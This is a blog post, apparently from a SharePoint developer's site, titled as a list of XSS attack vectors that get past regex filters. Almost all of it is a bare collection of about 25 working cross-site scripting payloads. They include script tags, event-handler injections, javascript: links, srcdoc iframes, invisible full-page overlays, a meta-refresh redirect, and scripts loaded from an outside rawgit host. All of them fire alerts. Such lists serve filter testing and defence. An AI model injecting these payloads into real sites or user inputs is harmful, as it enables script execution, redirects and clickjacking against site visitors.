<script >alert("XSS - 1");</script > <script type="application/javascript">alert("XSS - 2");</script > <script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script > <meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" /> <input type="image" src onerror="alert('XSS - 5')"> <object data="a.a" onerror="alert('XSS - 6')" /> <object data="a.a" onerror="alert('XSS - 7')"> <link data="a.a" onerror="alert('XSS - 8')"> <input onfocus="console.log('XSS - 9')" autofocus> // Uses console.log as "alert" will cause infinate loop <video ><source onerror="alert('XSS - 10')" > <iframe srcdoc="<script>alert('XSS - 11')</script>"> <iframe srcdoc="<script>alert('XSS - 12')</script>" /> <iframe srcdoc="<script>alert('XSS - 13')</script>"></iframe > <iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe > <iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15"> <iframe style="display:none;" src="//a.a" onload="alert('XSS - 16');"></iframe > <div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 17')"></div > <p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 18')"> <frameset onload="alert('XSS - 19')"><frame onload="Limited support"></frameset > <a href="javascript:alert('XSS - 20')" style="text-decoration: none; color:#000;" > <a onclick="alert('XSS - 21')" style="text-decoration: none; color:#000;" > <a onmouseover="alert('XSS - 22')" style="text-decoration: none; color:#000;" > <body onunload="alert('XSS - 23')"> <body onresize="alert('XSS - 24');"> <body onload="alert('XSS - 25')"> <body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">
My daily learnings on SharePoint, PowerShell, InfoPath, Nintex workflows, Lotus notes to SharePoint migration, minor bug fixes and major hotfixes
Saturday, February 1, 2020
List of XSS Attack Vectors vulnerable to REGEXP
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment